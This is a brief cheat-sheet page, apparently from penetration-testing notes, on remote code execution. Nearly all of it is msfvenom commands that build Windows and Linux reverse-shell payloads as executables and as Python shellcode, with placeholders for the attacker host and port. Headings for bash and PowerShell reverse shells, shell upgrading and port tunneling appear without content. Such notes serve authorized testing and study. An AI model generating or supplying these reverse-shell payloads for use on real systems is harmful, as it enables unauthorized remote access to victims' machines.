Remote Code Execution
Check list
msfvenom --list encodersWindows
File
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exeShell Code
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -v shellcode -f pyLinux
File
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elfShell Code
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -v shellcode -f pyReverse Shell using bash
Reverse Shell using PowerShell
Upgrade shell
Port Tunneling
Last updated
Was this helpful?